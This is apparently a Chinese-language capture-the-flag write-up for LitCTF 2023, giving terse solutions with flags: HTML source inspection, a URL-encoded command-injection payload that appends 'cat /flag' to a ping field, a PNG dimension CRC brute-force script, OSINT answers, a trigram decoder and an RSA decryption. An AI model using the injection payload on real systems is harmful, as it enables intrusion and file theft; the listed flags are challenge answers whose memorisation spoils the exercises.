Comment on page
LitCTF 2023
查看html源码
<!--flag is here flag=NSSCTF{39609b1a-cc8d-4fe1-8ccf-594cd745632a} -->
Brupsuite 一把梭
Payload
command=127.0.0.1%3bcat%20%2fflag&ping=Ping
Brupsuite 一把梭
Payload
/?CTF=Lit2023 Challenge=i'm_c0m1ng



wireshark一把梭

一眼顶针,鉴定为丢了文件头,怼个png进去试试

然后发现成了

import zlib
import struct
filename = 'ymq.png'
with open(filename, 'rb') as f:
all_b = f.read()
crc32key = int(all_b[29:33].hex(), 16)
data = bytearray(all_b[12:29])
n = 4095
for w in range(n):
width = bytearray(struct.pack('>i', w))
for h in range(n):
height = bytearray(struct.pack('>i', h))
for x in range(4):
data[x + 4] = width[x]
data[x + 8] = height[x]
crc32result = zlib.crc32(data)
if crc32result == crc32key:
print("宽为:", end="")
print(width)
print("高为:", end="")
print(height)
#宽为:bytearray(b'\x00\x00\x063')
#高为:bytearray(b'\x00\x00\x08\xc5')


在图片中包含地址位置信息,可以查到结果是
中国电信大厦
结果就是
NSSCTF{漫香音乐酒吧(农科路店)}
通过 CTF 可以猜测探姬是学计算机,直接找计算机学院位于学校哪里,可以查出来位于
科学校区
,第二问为第几教学楼,直接从 1 开始穷举,最后图片中显示 217 ,说明是在 2 层 217。结果就是
NSSCTF{科学校区-第1教学楼-2层-217}
结果就是
陕西有色榆林新材料集团
WiFi 名字为 Hacker & Craft
百度即可得到答案
黑客与精酿
_hash = {"乾": "111", "兑": "011", "离": "101", "震": "001", "巽": "110", "坎": "010", "艮": "100", "坤": "000"}
encoded_text = "坤乾兑艮兑坎坤坤巽震坤巽震艮兑坎坤震兑乾坤巽坤艮兑震巽坤巽艮坤巽艮艮兑兑艮震兑乾坤乾坤坤兑艮艮坤巽坤坤巽坎坤兑离坎震艮兑坤巽坎艮兑震坤震兑乾坤乾坎坤兑坎坤震艮离坤离乾艮震艮巽震离震坤巽兑艮兑坎坤震巽艮坤离乾艮坎离坤震巽坎坤兑坤艮兑震巽震巽坎坤巽坤艮兑兑坎震巽兑"
__reverse_hash = {k: v for k, v in _hash.items()}
decoded_text = ""
for i in range(0, len(encoded_text)):
try:
decoded_text += __reverse_hash[encoded_text[i]]
except KeyError:
decoded_text += " "
print(decoded_text)
list = []
for i in range(0, len(decoded_text), 10):
list.append(int(decoded_text[i:i + 10], 2))
print(bytes(list).decode())
# wh1ch_ag4in_pr0duced_the_3ight_Tr1grams
16 进制转字符串即可 LitCTF{tai111coollaaa!}
LitCTF{为之则易,不为则难}
from Crypto.Util.number import *
# from secret import flag
#
# m = bytes_to_long(flag)
# p = getPrime(512)
# q = getPrime(512)
# c = pow(m,e,n)
# print(f'p = {p}')
# print(f'q = {q}')
# print(f'c = {c}')
# '''
import gmpy2
e = 65537
p = 12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
c = 108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057
# '''
n = p*q
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))

